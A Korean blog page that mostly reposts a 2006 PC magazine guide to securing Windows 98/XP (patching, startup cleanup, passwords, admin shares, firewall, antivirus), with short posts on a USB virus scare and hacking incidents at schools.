       그러면 다음과 같이  파일을  고칠수 없다고 메세지가  나옵니다..

       비슷한 경험 하신 분 계신가요?
신고
Posted by 엔시스

대부분 USB를 이용한 메모리를 많이들 사용합니다.   디카로 사진을 찍고 메모리에서 로딩을 하려는 순간 당황하게 되었습니다.

그건 바이러스 걸렸다는 메세지와 함께  이동디스크로 연결된 USB메모리를 인식하지 못하는 것입니다. 다행히 백신 프로그램을 깔아 놓아서 알게 되었지만...왜 그런지 모르겠네요..

사용자 삽입 이미지

 개인은 무료로 사용가능하기 때문에 AVG를 사용하고 있습니다..그런데 위험한 메세지 ...
아..그러나 그보다 더 중요한건 디카에 들어있는 각종 사진이었습니다..인식이 안되니 삭제밖에 할수 없는 상황인지 ...

이 눔의 바이러스는 정말 어떤 짓을 할지 모르니 ....

별로 뾰족한 수가 안나와서 한참 고민을 하다가 다시 USB를 연결하고 나서 자동으로 뜨는 프로그램으로 일단 파일을 복사을 하였습니다.

그리고 바로 클릭해서 이동디스크쪽으로 파일을 읽을수 없으면 마우스 오른쪽 버튼을 이용한 탐색기능으로 사용하시기 바랍니다... 당연히 바이러스는 치료하여야 겠지요...
신고
Posted by 엔시스

출처: PC사랑 2006-8월호

구멍 뚫린 보안, 내 PC는 안전한가?
어떤 악성코드에도 끄떡없는 튼튼 PC를 만들자!


가짜 금융 사이트를 만들어 개인 정보를 빼내는 피싱 공격이 10배 이상 늘어나고 컴퓨터에 몰래 숨어 들어가서 시스템을 파괴하거나 다른 PC를 공격하도록 유인하는 악성 봇(Bot)도 크게 늘었다. 바람 잘 날 없는 인터넷이다. 이런데도 우리나라 OS 시장의 대부분을 차지하고 있는 마이크로소프트(이하 MS)는 2006년 7월부터 윈도 98의 업데이트를 하지 않겠다고 발표했다. 간단한 문서 작업을 하거나 음악을 듣고 인터넷을 하기에는 쓸만하기에 윈도98을 쓰는 사람들은 아직도 많다. 이런 때에 MS의 윈도 98 업데이트 중단 발표는 윈도 98 유저들에 대한 외면이랄 수밖에 없다.
윈도 98이 업데이트 되지 않으면서 생기는 가장 큰 문제는 보안에 큰 구멍이 생긴다는 것이다. 나날이 발전하는 해킹 수단이나 바이러스, 웜 등에는 꾸준한 보안 업데이트가 없으며 무방비로 노출될 수밖에 없기 때문이다. MS는 "윈도XP는 보안이 강하다"고 목소리를 높이고 전문가들도 "만족스럽지 않지만 윈도 98보다 외부 공격에 잘 견디도록 설계되었다"고 입을 모은다. 2004년 9월 서비스팩 2가 나오면서 상황이 나아졌지만 아직 부족한 점이 눈에 뜨인다. 더 이상 업그레이드가 없는 윈도 98, 서비스팩 2로도 안심할 수 없는 윈도XP. 어떤 것을 조심해야 하는지 하나씩 점검해본다.

[PC 보안-Ⅰ] 윈도는 최신인가?

2003년 8월 12일 인터넷을 공격한 블래스터 웜은 감염된 PC를 1분마다 재부팅한다. 전원이 켜지고 정확히 1분 뒤 시스템이 재부팅되므로 윈도를 쓰지도 못할뿐더러 웜을 치료할 틈도 없었다. 하지만 이미 7월 16일에 MS가 내놓은 보안 패치(MS03-026)를 했다면 막을 수 있었다.
2004년 4월에 비슷한 증상으로 네티즌들을 괴롭혔던 새서(sasser) 웜도, 2003년 1월 25일 국내 인터넷망을 초토화시킨 슬래머 웜도 패치만 미리 깔았다면 아무런 피해도 입지 않았을 것이다.
패치(patch)는 소프트웨어에 생긴 허점을 메우는 작은 프로그램을 통틀어 가리킨다. MS도 운영체제에서 발견된 오류를 해결하는 패치를 정기적으로 내놓는데, 보안과 관련된 것을 '보안 패치'라고 부른다(마이크로소프트는 이를 '핫픽스'라고 한다.)
패치를 반드시 해야 하는 이유는 운영체제에 오류가 있어서만은 아니다. 블래스터, 새서, 슬래머 웜에서 드러났듯이 시스템 공격자들은 MS가 내놓은 코드를 분석해서 윈도에 어떤 구멍이 있는지 알아낸다. 그리고 이를 공격하는 악성 코드를 만들어 인터넷에 뿌린다. 흔히 악성코드가 피해를 입히면 그제야 패치가 나온다고 생각하지만 그 반대일 수도 있다. 악성코드보다 먼저 스스로의 약점을 알아내 패치가 먼저 나올 때도 있다.

업데이트 확인하기
패치는 윈도 업데이트 사이트(update.microsoft.com)에서 내려 받으면 저절로 깔린다. 이 사이트에는 보안 패치 외에도 최신 드라이버와 유틸리티 등이 가득하므로 윈도의 성능을 높이는 데도 도움이 된다. 윈도 업데이트는 시작 → windows update 또는 익스플로러의 도구 → windows update를 누르면 윈도 업데이트 사이트에 접속한다.
여기서 ‘빠른 설치’와 ‘사용자 지정 설치’ 버튼이 있다. ‘빠른 설치’는 중요한 패치를 알아서 다 받아주고, ‘사용자 지정 설치’는 이용자가 원하는 것을 골라 받는다. ‘사용자 지정’ 버튼을 눌러 ‘자세한 정보’를 열면 현재 등록된 패치를 볼 수 있다. 이것들을 내려 받으려면 ‘설치’ 버튼을 누르면 된다. 윈도 업데이트 사이트에서 받은 패치 목록은 왼쪽의 ‘업데이트 내역 검토’에서 확인한다.

자동 업데이트 설정하기
중요한 패치가 나왔는지 확인하려고 날마다 윈도 업데이트 사이트를 찾을 순 없다. 윈도 XP의 ‘자동 업데이트’는 새로운 패치가 나오면 즉시 알려준다. 자동 업데이트에 관한 명령은 시작→설정→제어판→자동 업데이트에서 정한다. 여기에는 ‘자동’ ‘업데이트를 다운로드하고 이용자가 원하는 시간에 설치’ ‘업데이트 정보를 사용자에게 알리지만 자동으로 다운로드하거나 설치하지 않는다’ ‘자동 업데이트를 사용하지 않는다’ 등 4가지 옵션이 있다.
① 업데이트 사이트에서 파일을 내려 받는다. 이 과정은 PC 이용자에게 보고되지 않는다.내려 받은 파일은 매일 오전 3시에 깔린다. 만약 이 시각에 PC가 꺼져 있다면 다음에 켰을 때 깔린다.
② 백그라운드로 파일을 내려받는 것은 ‘자동’과 같다. 하지만 미리 정환 시각에 자동으로 깔리는 게 아니라 작업 표시줄에 ‘업데이트 파일을 설치할 준비가 끝났다’는 아이콘이 뜬다. 이 아이콘을 눌러 업데이트한다.
③ 윈도 업데이트 사이트에 새로운 파일이 올라오면 아이콘이 뜬다. 이것을 눌러 파일 전부나 일부를 내려 받는다. 필요한 것을 다 받으면 다시 아이콘이 뜬다.
④ 자동 업데이트를 쓰지 않는다. 이때는 윈도 업데이트 사이트에 자주 접속해서 새로운 파일이 올라왔는지 확인한다.


외부 공격을 막기 위해 보안 프로그램을 까는 것은 너무나 당연하지만 하루가 멀다 하고 새로운 악성코드가 나오면서 보안 프로그램만 믿을 수는 없다. 최근의 악성코드는 독립적인 파일로 실행되는 게 많아서 실행을 멈추면 피해를 줄일 수 있다. 현재 실행 중인 프로세스 중에서 무엇이 악성 코드인지 아는 것은 쉬운 일이 아니다. 따라서 평소에 실행 프로세스에 관심을 갖고 있어야 긴박한 상황에서 도움을 받는다.

프로세스 확인하기
프로세스는 현재 이용자가 실행한 프로그램의 실행 파일과 시스템을 운영하기 위해 시스템이 실행한 프로세스 두 가지가 있다. 현재 실행중인 프로세스도 아니고 시스템이 실행한 프로세스도 아닌 것이 CPU를 많이 쓰거나 메모리를 많이 차지하고 있으면 해당 프로세스를 의심해야 한다. 일반적으로 이용자가 쓰는 프로그램 이름은 쉽게 알 수 있다. 포토샵은 photoshop.exe이고 한글은 hwp.exe다. 그렇다면 윈도가 돌아갈 때 필요한 기본 프로세스가 어떤 것인지 알아두자.



explorer.exe윈도의 기본 쉘이다. 이용자가 파일을 클릭하거나 프로그램을 실행하면 이 쉘이 윈도에 전달한다.
internat.exe키보드 입력 로케일을 관리하는 프로세스다. 트레이에는 현재 한영 상태를 표시한다.
taskmgr.exe작업 관리자의 실행 파일이다. 프로세스를 확인하기 위해 작업 관리자를 열었기 때문에 나타난다.
csrss.exe윈도 생성, 쓰레드, 16비트 가상 MS-DOS 모드를 관리한다.
winlogon.exe이용자가 로그인할 때 뜨는 프로세스다.
lsass.exe이용자 인증이나 보안에 관련된 부분을 관리하는 프로세스다.
mstask.exe보통은 보이지 않지만 예약 작업을 관리한다.
system쓰레드를 만들고 실행하는 윈도의 기본 프로세스다.
spoolsrv.exe프린터의 스풀링을 담당한다.
winmgmt.exe윈도의 클라이언트를 관리한다. 클라이언트의 요청에 따라 초기화 등을 한다.
svchost.exe윈도 라이브 파일인 dll 파일로 실행되는 프로세스를 관리한다. 이런 프로그램이 많으면 svchost.exe도 그만큼 생긴다.
services.exe윈도의 백그라운드 서비스를 관리한다.

[표 1] 윈도의 기본 프로세스의 이름과 역할


표에 있는 것은 말 그대로 가장 기본적인 프로세스들이지만 이용자의 PC에 따라 조금씩 다를 수 있다. 수상한 프로세스가 있지만 어떤 프로세스인지 잘 모른다면 www.liutilites.com/products/wintaskspro/processlibrary에 접속해 보자. 여기서 프로세스 이름을 검색하면 시스템 관련 프로세스인지 웜이나 악성 프로그램인지 알려주므로 도움이 된다. 웜이나 스파이웨어가 확실하다면 키를 눌러 ‘작업관리자’를 띄운 뒤 ‘프로세스’ 탭을 누른다. 의심이 가는 프로세스를 끝내려면 그것을 골라 ‘프로세스 끝내기’ 버튼을 누른다.

시작 프로그램을 정리하자
앞에서 본 것처럼 작업관리자에서 프로세스를 멈췄다고 해도 윈도 시작 프로그램으로 등록되어 있으면 윈도가 시작할 때마다 다시 뜬다. 그러므로 프로세스뿐 아니라 시작 프로그램도 찾아봐야 한다. 윈도 시작 프로그램을 정리하는 방법은 세가지가 있다.
시작→프로그램→시작 프로그램 폴더에 등록된 것을 없애거나 msconfig 프로그램, 레지스트리에 등록된 것을 지우는 것이다.

첫째, 시작 프로그램 폴더에 등록된 것을 지우는 것은 쉽다. 시작→프로그램→시작 프로그램을 고르고 여기에 바로가기 아이콘을 고른 뒤 마우스 오른쪽 버튼을 눌러 ‘삭제’를 고른다.

둘째, 시작→실행을 누르고 msconfig라고 치고 엔터 키를 눌러 ‘시스템 구성 유틸리티’를 실행한다. ‘시작프로그램’ 탭을 고르면 윈도가 시작할 때 뜨는 프로그램 목록이 뜬다. 윈도에 깔아놓은 프로그램이 많으면 여기에 등록된 것이 많다. 체크 표시를 빼면 된다. 다음 표는 윈도 시작 프로그램에 등록되는 프로그램이다. 여기서 어떤 것을 빼고 어떤 것을 빼지 말아야 하는지 고민해야 한다. 이 부분이 시작프로그램 관리에서 가장 중요하고 어려운 부분이다. 이용자마다 쓰는 프로그램이 다르기 때문에 자신의 PC에서 필요한 것인지 아니지 판단할 수 있는 기준이 없다. 모두 이용자가 PC에 깔린 응용프로그램에 대해 필요한 것인지 아닌지를 판단해야 한다.



실행 파일 이름설명
LoadPowerProfile전원관리 프로그램으로 윈도의 전원관리를 한다.
ctfmon고급 입력 로케일 프로그램이다. IME 한글 입력기다. 한영 입력을 한다.
IMJPMIGctfmon과 함께 필요한 프로그램이다.
TINTSETPINJPMIG와 더불어 ctfmon에 필요한 프로그램이다.

[표 2] 윈도 XP를 처음 깔았을 때 msconfig에 등록된 시작 프로그램


실행 파일 이름설명
AhnSD안철수연구소 V3 백신 프로그램
daemon DAEMON Tools데몬툴 가상 CD 프로그램
NeroCheck네로 버닝롬 체크 프로그램
msmsgsMSN 메신저 프로그램
autoupdate응용프로그램의 자동 업데이트 프로그램

[표 3] 윈도 기본 시작 프로그램 자주 등록되는 프로그램


체크 표시를 해제하면 실행되지 않는다. 자신이 잘 모르는 프로그램을 해제하면 시스템에 이상이 생길 수 있으니 정확히 아는 것만 없앤다. ‘확인’을 누른 뒤 윈도를 다시 시작한다.

셋째, 앞선 두 가지 방법을 써도 작업 관리자에 프로세스가 뜬다면 레지스트리에 등록된 것이므로 이것을 손봐야 한다. 시작→실행을 누르고 regedit라고 치고 레지스트리 편집기를 연다. HKEY_LOCAL_MACHINE → SOFTWARE → Microsoft → Windows → CurrentVersion → Run 키를 찾는다. 오른쪽 창에 시작 프로그램 목록이 뜬다. 여기서는 자신에게 필요 없는 것을 골라 Del 키를 눌러 지운다.

불필요한 프로그램은 지운다
PC를 쓰다 보면 많은 프로그램들을 깔아서 쓰게 된다. 또한 내가 모르는 사이에 내 PC에 깔리는 프로그램도 생긴다. 이런 프로그램들 중에서 일부는 불필요한 것도 있을 수 있고, 하드디스크 용량과 메모리를 차지해서 PC의 성능을 떨어뜨리고 보안을 위협하기도 한다. 따라서 반드시 필요한 프로그램 외에는 지우는 게 좋다.
시작 → 제어판 열고 ‘프로그램 추가/제거’를 고른다. ‘프로그램 추가/제거 등록정보’ 창이 열리면 내 PC에 깔린 프로그램들이 무엇인지 볼 수 있다. 내가 깔지 않은 프로그램을 찾는다. 지울 프로그램을 고른 뒤 ‘추가/제거(R)…’ 버튼을 눌러 지운다.

윈도 98와 윈도 XP에서 ‘계정’이라고 하는 것은 PC 이용자를 뜻한다. PC를 켰을 때 아이디와 암호를 넣는 것은 윈도에게 이용자가 누구인지를 알려주는 것이다. 윈도 XP는 계정이 administrator(관리자)와 guest(제한된 이용자) 두 가지다. 계정을 이렇게 나누는 것은 시스템을 관리하는 권한을 구분하기 위해서다. Administrator는 윈도 설정을 바꾸고 프로그램을 지우거나 깔 수 있다. 제어판의 모든 명령을 제약 없이 이용한다고 생각하면 된다. 반면에 guest는 이미 깔린 프로그램을 쓰는 것에 만족해야 한다. 계정을 만들 때는 암호도 정하는데, 어렵게 만들지 않으면 쉽게 노출된다. 일부 이용자들은 암호를 치는 것이 귀찮거나 걸지 않은 PC라면 누구나 쉽게 볼 수 있고, 인터넷을 통해 침입할 수 있다. PC를 안전하게 지키는 암호를 거는 게 좋다.

윈도를 쓰려면 계정과 암호를 넣어라!
로그인 암호는 부팅 단계에서 이용자를 확인하는 바이오스 암호와 달리 윈도에서 이용자를 확인하는 것이다. 윈도에서 로그인 할 때 등록된 이용자만 컴퓨터를 쓸 수 있도록 해준다. 로그인 창에서 이용자는 자신의 사용자 이름과 암호를 치면 윈도를 쓸 수 있다.
다른 사람의 방해를 받고 싶지 않거나 외부 공격으로부터 자유롭기 위해서라도 계정은 반드시 필요하다. PC 한 대를 여럿이 쓸 때는 프라이버시를 위해서, 혼자 쓸 때는 혹시 모르는 침입을 막기 위해 계정을 만들어서 암호를 걸어놓는다.
계정을 만들려면 시작→제어판을 고르고 ‘사용자 계정’ 아이콘을 누른다. 사용자 계정이 뜨면 administrator(또는 자신의 계정)가 보일 것이다. 암호를 걸려면 자기 계정으로 들어가 ‘암호 만들기’를 누른다. 만약 새로운 계정을 등록하려면 계정 창에서 ‘새 계정 만들기’를 누른다. ‘새 암호’ 항목에 암호를 집어넣고 ‘확인하기 위해 다시 새암호 입력’에도 똑같이 친다. 마지막에는 암호를 잊어버렸을 때를 대비해서 ‘암호 힌트’를 넣는다. 이것은 꼭 입력할 필요는 없다. 만약 암호를 없애려면 지금 ‘암호 변경’ 창에서 지금의 암호를 쓴 뒤 ‘새암호’ 칸을 비워놓으면 된다.

암호는 복잡하게 쓰자
암호를 만들 때 대부분 숫자나 자신이 기억하기 쉬운 단어 등을 이용해서 암호를 쓴다. 그러나 이런 암호는 해커들이 쓰는 간단한 프로그램을 이용하면 쉽게 알아낼 수 있다. 암호는 되도록 복잡한 것을 써야 안전하다. 반대로 너무 복잡한 암호를 만들어 놓고 잊어버릴까봐 암호를 수첩에 적어놓거나 심지어는 책상 근처에 메모해 놓아 다른 사람이 보게 되는 수도 있다. 몇 가지 예를 보자.

① 00000
② password
③ dlwlgn2575
④ EJrqhRdl


①은 너무 쉬운 번호라서 암호로 적당하지 않다. ②는 길이는 적당하지만 영문 단어이므로쉽게 노출 된다. ③은 영어와 숫자가 8자리 이상으로 조합되어서 적절하다. ④는 비록 영어로만 구성되었지만 한글 ‘떡볶이’인 쌍자음이 들어갔다. 즉 대소문자가 섞여 있어 쉽게 알아내기 힘들다. 암호를 만들 때는 숫자와 문자(대문자, 소문자)로 만들고 특수문자(!@#$%^&* 등)까지 넣으면 해킹의 위험은 거의 없다고 할 수 있다.
비교적 긴 길이의 암호라도 입력하는 모습을 다른 이가 보면 추측을 해서 알아낼 수 있다. 또한 해킹 기술의 일종인 ‘스니핑’을 쓰면 암호를 알아낼 수 있다. 스니핑은 일종의 도청기술로서, PC에서 송수신되는 데이터를 해커에게 보내준다. 암호 역시 스니핑에 의해 네트워크에 노출될 수 있다. 따라서 일정 시간이 지나면 암호를 바꾸는 게 좋다. 적어도 3개월 정도마다 한 번씩 바꿔주는 게 좋다.

쓰지 않는 계정을 막아라
윈도 XP는 이용자 계정뿐 아니라 여러 가지 시스템 관리 계정이 생긴다. 제어판의 사용자 계정에서 보이지 않을 뿐이다. 이런 관리자와 사용자 계정은 시스템의 주요 설정에 대한 권한을 갖느냐의 차이에 따라 위험성이 다르다. 이미 깔린 프로그램을 쓰는 것이 전부인 사용자에 비해 관리자는 프로그램을 깔고 시스템 설정을 바꾸는 등 권한이 막강하므로 시스템을 망가뜨릴 수 잇다. 계정을 막으려면 시작 → 실행을 누르고 lusrmgr.msc라고 치고 엔터 키를 눌러 ‘컴퓨터 관리’를 연다. 계정을 막으려면 계정 목록에서 쓰지 않는 계정을 찾아 계정을 마우스 오른쪽 버튼으로 누르고 ‘속성’을 고른 뒤 ‘계정 사용 안함’을 체크한다. 그렇다고 모든 계정을 막는 것은 바람직하지 않다. 이용자가 만든 계정이나 guest 계정을 중지시키는 것은 상관없지만 PC가 쓰는 계정(ASPNET, HelpAssistant 계정 등)까지 막으면 프로그램 실행에 문제가 생길 수 있다.

2001년 9월 17일 미국, 유럽, 라틴 아메리카에 퍼진 ‘님다’ 바이러스는 다음날 저녁 한국에 상륙하면서 엄청난 피해를 입혔다. 님다 바이러스는 e메일로 퍼졌지만 공유폴더를 뚫고 들어오기도 한다. 님다뿐만 아니라 win32/parite, win32/lovgate.worm 등도 공유폴더로 침입해서 시스템을 감염시킨다. 공유폴더는 다른 사람과 자료를 공유하려고 네트워크에 만들어놓는 저장 공간이다. 집으로 치자면 문을 활짝 열어놓는 것과 같아서 사고의 위험이 많다. 그런데도 쓰는 이유는 그만큼 편하기 때문이다. 예를 들어, 회사에서 프로젝트를 진행할 때 관련 자료를 공유폴더에 놓으면 동료들이 공유폴더에서 자료를 쉽게 끌어와서 읽거나 편집할 수 있다. 공유폴더를 쓰더라도 보안에 각별히 신경을 써야 한다.

공유폴더 만들기
윈도 XP는 보안 기능이 뛰어나서 계정과 암호를 모르면 절대로 폴더나 파일을 읽을 수 없다. 따라서 고유폴더를 만들더라도 완전 공개가 아니라 계정과 암호를 알아야만 읽을 수 있게 설정하는 게 좋다. 공유폴더를 만들 때는 ‘읽기 전용’으로 해서 혹시나 모르는 외부 침입을 막는다. 만약 다른 사람에게 자료를 쓰는 권한을 주더라도 이는 믿을 수 잇는 사람만 쓸 수 있게 한다.
네트워크에 개방할 폴더를 만들려면 마우스 오른쪽 버튼을 누르고 ‘속성’을 고른다. 공유 폴더의 등록 창에서 ‘공유’ 탭에 있는 ‘이 폴더를 공유’를 체크한다. ‘공유’ 탭이 없으면 탐색기의 도구→ 폴더 옵션 → 보기 탭에서 ‘모든 사용자에게 동일한 폴더 공유 권한 지정’의 체크 표시를 없앤다. 이제 같은 ‘작업 그룹’(제어판→시스템→’컴퓨터 이름’ 탭의 ‘변경’ 버튼)에 속한 사람들은 이 폴더를 자유롭게 드나들 수 있다. 접속자를 제한하려면 이 창에서 ‘사용 권한’을 누른다. Everyone은 작업 그룹의 모든 사람을 가리킨다. 내 공유폴더에 들어오는 모든 사람에게 같은 권한을 준다는 얘기다. 이들이 읽기만 하게 하려면 ‘읽기’를 ‘허용’으로 한다.

관리 목적 공유폴더를 없애라
공유폴더는 아이콘에 손바닥 그림이 붙기 때문에 탐색기에서 바로 알 수 있다. 하지만 깊숙이 숨어 있는 공유폴더라면 찾기 어려울 수도 있다. 모든 공유폴더를 확인하는 방법은 ‘컴퓨터 관리’다. 제어판→관리도구→컴퓨터 관리를 눌러 창을 띄운 뒤 왼쪽 창에서 공유폴더→공유를 누르면 오른쪽에 공유폴더가 나타난다. 그런데 여기에는 C$, D$와 같이 내가 공유하지 않은 드라이브까지 공유된 것으로 나온다. 이것은 ‘관리목적 공유폴더’라고 한다. 풀이하면 ‘컴퓨터나 네트워크 관리를 목적으로 만든 폴더’다.
네트워크에 연결되는 순간 각 PC의 모든 드라이브가 공유되었기 때문에 시스템들을 손쉽게관리할 수 있다. 하지만 이 관리목적 공유폴더는 보안이 취약하다. IP 주소, 관리자 계정의 ID와 암호만 알면 누구나 쉽게 뚫고 들어올 수 있다. 2004년의 win32/IRCBot.worm도 이 폴더를 공격했다. 이 폴더는 개인 이용자에게는 필요 없는 것이다. 공유하지 않도록 바꾸면 그만큼 안전해진다. 하지만 마우스 오른쪽 버튼을 눌러 ‘공유중지’를 시켜도 그때뿐이다. 재부팅하면 다시 생긴다. 따라서 레지스트리를 고쳐 공유하지 않도록 바꾸자.
시작 → 실행을 누르고 rdgedit라고 쳐서 레지스트리 편집기를 연다.
HKEY_LOCAL_MACHINE→System→CurrentControlSet→Services→LanmanServer→Paramaters를 연다. 오른쪽 창에서 AutoShareWks 키를 골라 오른쪽 버튼을 눌러 ‘수정’을 고른 뒤 값을 0으로 바꾼다. 키가 없다면 빈 곳에 마우스 오른쪽 버튼을 눌러 등록→DWORD 값을 고른 뒤 이름을 AutoShareWks로 바꾸고 값을 0으로 한다. 레지스트리 편집기를 닫는다. 재부팅을 한다. 관리목적 공유폴더가 사라졌는지 확인하려면 제어판→관리도구→컴퓨터 관리를 열고 컴퓨터 관리→시스템 도구→공유 폴더→공유를 눌러 C$와 D$ 등이 있는지 본다.


네트워크는 물리적으로는 통신망을 연결하는 것이지만 논리적으로는 ‘포트’(port)를 통해 인터넷을 항해하고, e메일을 주고 받고, 메신저로 대화를 나눈다. 포트는 0번부터 65,536번까지 있다. 이 중에서 0~1,023은 인터넷 표준 기구인 IANA(internet assigned numbers authority)가 관리하는 ‘잘 알려진 포트’(well known port)다. 그 중에 대표적인 것을 살펴보면 웹은 80번, FTP는 21번, 텔넷은 23번이다. IANA는 이처럼 가장 일반적인 인터넷 서비스에 대한 포트를 정해서 혼란을 막는다. 이런 기준이 없다면 어느 웹 서버는 포트가 80번이지만 또 다른 웹 서버는 90번이면 웹 서비스를 제대로 이용할 수 없을 것이다. IANA는 1,024 포트부터는 따로 규칙을 정하지 않고 누구나 자유롭게 쓸 수 있게 했다. 따라서 메신저, P2P 프로그램은 1,024 이후의 포트를 이용한다. 예를 들어 스타크래프트 배틀넷은 6112 포트다.

포트에 대해 헛갈리지 않으려면 ‘애플리케이션’이라고 이해하는 게 좋다. 앞에서 웹은 80번 포트를 쓴다고 했다. 이를 “내 PC의 80번 포트와 웹 서버의 80번 포트가 연결된 것”으로 오해할 수 있는데 80번 포트는 서버의 포트다. 시스템을 웹 서버로 꾸미는 애플리케이션이 뜨면서 80번 포트를 열어놓고 접속을 기다리는 것이다. 따라서 우리가 웹 사이트에 들어갈 때는 80포트를 통과하지만 그곳에서 받은 정보가 내 PC로 들어올 때는 1,024 이후의 포트를 이용한다. 내 PC는 몇 번 포트로 웹 서비스를 받는지 궁금하겠지만 운영체제가 그때그때 비어있는 포트를 쓰게 하므로 포트가 정해진 후에야 알 수 있다. 이렇듯 포트를 통해서 데이터를 주고 받는 통로는 이론적으로 6만5천537개나 된다. 그 수만큼의 통로가 외부에 열려 있어서 언제 공격 당할 지 모른다. 이를 막기 위한 안전장치가 ‘방화벽’이다. 수많은 포트 중에서 정상적인 것만 열어놓고 나머지를 닫는다.

윈도 XP의 방화벽
윈도 XP가 처음 나왔을 때는 방화벽이 들어 있지 않아 방화벽 프로그램을 깔아야 했지만 윈도 XP는 서비스팩 2에 방화벽을 포함시켜 누구나 쉽게 방화벽으로 PC를 보호할 수 있다. 제어판의 방화벽에는 ‘사용(권장)’ ‘예외 허용 안 함’ ‘사용 안 함’ 3가지 옵션이 있다. 이것을 이용해서 포트를 관리한다.

① ‘사용(권장)’은 윈도 방화벽의 기본 값이다. 이것은 ‘예외’ 탭에 등록한 프로그램이나 서비스를 뺀 나머지 신호를 막는다. 예를 들어 ‘예외’ 탭에서 ‘원격 지원’과 ‘파일 및 프린터 공유’를 체크하면 외부에서 이 시스템을 원격 접속하거나 네트워크가 다른 시스템과 파일이나 프린터를 이상 없이 공유한다.
② ‘예외 허용 안 함’ 탭에 등록한 프로그램이나 서비스를 비롯해 대부분의 외부 통신을 무조건 막는다. 이 상태에서는 인터넷, e-메일, 메신저와 같은 가장 기본적인 서비스만 이용할 수 있다. 라디오를 듣거나 호텔이나 공항과 같은 공공 네트워크에는 연결하지 못한다. 위험한 바이러스나 웜이 인터넷에 퍼질 때는 이 옵션을 이용하면 PC를 안전하게 보호할 수 있다.
③ ‘사용 안 함’을 체크했을 경우 방화벽이 해제되면서 외부로 연결된 모든 문이 열려 자유롭게 신호가 드나든다. 네트워크가 지나치게 자유로워지므로 피해를 입기 쉽다.

바이러스도 문제지만 웜이나 스파이웨어 등을 차단하는 기능까지 합쳐져 백신이라기보다는 종합 보안 프로그램이라고 할 수 있다. 이런 프로그램들은 웜 바이러스를 미리 알아채고 이미 감염되어 있는 것을 없애준다.
우리나라에서는 안랩의 ‘V3 프로’, 외국에서는 노턴안티바이러스 등 많은 보안 프로그램이 잇다. 어떤 것을 쓰느냐는 이용자의 몫이고 PC에는 하나씩 보안 프로그램을 깔아 주는 게 좋다. 정품 소프트웨어를 구입해서 쓰거나 보안 업체에서 배포하는 프리웨어를 이용해도 된다. 보안 프로그램을 깔았다고 끝나는 것이 아니다. 꾸준하게 관리하는 자세가 필요하다.

바이러스 검사를 자주 한다.
백신을 깔아 놓아도 웬만한 것은 막아주지만 그래도 PC 전체를 검사하는 작업을 자주 해주는 게 좋다. 이용자가 직접 수동으로 검사할 수도 있지만 예약을 해두면 정해진 주기마다 자동으로 검사하게 할 수 있다. 다만 자동 검사는 PC가 켜져 있을 때만 작동한다. 그렇지만 이용자가 PC를 쓰는 시간에 검사를 하면 PC가 느려지는 등의 문제가 있으므로 점심시간 등 이용자가 PC를 쓰지 않는 시각으로 정하는 게 좋다.
예를 들어 V3 2004는 V3 프로그램을 열고 도구→ 예약 검사를 골라 예약 검사 창을 연다. 예약 검사 창에서 ‘추가’ 버튼을 눌러 ‘검사 주기’와 ‘검사 대상’을 정한다. 적당한 시각과 대상을 고르면 자동으로 바이러스 검사를 한다.

바이러스 엔진은 최신으로 유지하자
웜 바이러스는 신종 또는 기존 것의 변형이 나타나는 속도가 매우 빠르다. 나날이 발전하고 늘어나는 웜 바이러스를 백신프로그램이 탐지하려면 백신업체가 서비스하는 최신 엔진을 항상 유지해야 한다. PC가 인터넷에 연결되어 있다면 간단하게 업데이트를 해주는 자동 업데이트 옵션을 써서 업데이트를 할 수 있다. ‘V3 프로 2004’ 창에서 현재 엔진의 날짜를 확인하고 최신의 것이 아니라면 백신 엔진을 최신의 것으로 업데이트해야 한다. 이전 버전의 엔진이 탑재된 백신 프로그램으로는 자주 검사한다 하더라도 새로운 웜 바이러스는 탐지할 수 없으니 중요하다. ‘V3프로 2004’ 에서 수동으로 업데이트 하려면 왼쪽 위에 있는 ‘업데이트’ 버튼을 누르면 된다. 업데이트가 끝나면 엔진의 날짜가 최근 것으로 바뀐다. 매번 수동 업데이트하기가 귀찮다면 예약 검사처럼 업데이트도 자동으로 하게 설정한다. ‘스마트 업데이트 유틸리티’창을 열고 ‘환경 설정’ 버튼을 누르고 ‘예약 설정’ 탭을 고른다. ‘추가’ 버튼을 누르고 ‘주기’ ‘요일’ ‘시각’을 정하고 확인을 누르면 예약이 된다.

실시간 감시는 항상 켜놓자
예전의 백신 프로그램은 바이러스에 감염된 뒤에 치료하는 방식이었지만 요즘 나오는 백신이나 보안 프로그램은 감염을 미리 막는데 노력한다. 이것이 ‘실시간 감시’ 기능이다. 파일이나 e메일, 메신저 등을 감시해서 바이러스가 있다면 이를 읽지 못하게 해서 감염을 막고 치료하는 것이다. 어떤 이들은 실시간 감시가 윈도를 느려지게 한다면서 꺼놓으라고 하기도 하는데 안전을 생각한다면 반드시 켜놓자.
V3 프로 2004창에서 ‘실시간 검사’ 부분을 보면 실시간으로 검사하고 있는 항목을 확인할 수 있다. ‘시스템 감시’ ‘인터넷 감시’ ‘시작 프로그램 감시’ ‘POP3 감시’ 등이다. On은 가시하고 있다는 것이고 Off는 감시하지 않는다는 뜻이다.

From PC사랑 2006년 8월호

신고
Posted by 엔시스
국가사이버 안전센터 9월호에 따르면 아직도 교육기관이 여전히 해킹 사각지대로 나타나는걸을 알수 있다.  지난 블로깅에서도 이야기했다시피 어찌 보면 아이러니 한 사항일지도 모른다
그건 아마 가장 취약할수 있는 중,고등학교에 관련 전담인력이 없어서 일지도 모른다.

사용자 삽입 이미지

위그림에서 알수 있듯이 아직도 웜 바이러스에 의한 사고 유형이 많으며 이는 해당 운영체제 담당하시는 사람들의 마인드에서 비롯되지 않은가 생각한다.  웜과 바이러스는 최신 운영체제 패치만으로도 상당한 효과를 거둘수 있기 때문이다.

또한 그림3에서는  교육기관과 지자체가 단연 절반에 가까운 사고를 당한걸로 나타난다. 이는 중앙행정기관에서 일괄적으로 처리하는 형태보다는 각 지자체에서 전담할수 있는 인력이 있어 바로 현장에서 처리할수 있는 인력이 필요할 것이다.  사실 , 해당 기관에 인력이 있는지 없는지는 알수가 없다. 만약, 있다고 하면 담당자는 자신의 역할을 다하지 못한 것이다.

다음 포스팅에는 왜 교육 기관이 항상 많은 사고를 당하는지와 그 해결 방안은 없는지에
대한 포스팅을 해 보고자 한다.


사용자 삽입 이미지

